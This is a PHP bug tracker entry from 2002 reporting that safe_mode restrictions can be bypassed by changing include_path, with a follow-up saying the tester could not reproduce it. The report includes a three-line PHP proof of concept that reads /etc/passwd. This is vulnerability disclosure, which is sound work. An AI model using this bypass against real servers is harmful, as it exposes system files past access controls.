ID: 17169
Updated by: [EMAIL PROTECTED]
Reported By: [EMAIL PROTECTED]
Status: Open
Bug Type: Performance problem
Operating System: Linux 2.4.18
PHP Version: 4.2.0
New Comment:
I has test this on 4.1.2 & 4.2.0 and it not work for me.
Previous Comments:
------------------------------------------------------------------------
[2002-05-12 19:16:58] [EMAIL PROTECTED]
By setting include_path setting to any directory readable to the
webserver it is possible to read files from the directory regardless of
safe_mode limitations.
Ex.
<?php
ini_set('include_path', '/etc/');
include('passwd');
?>
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=17169&edit=1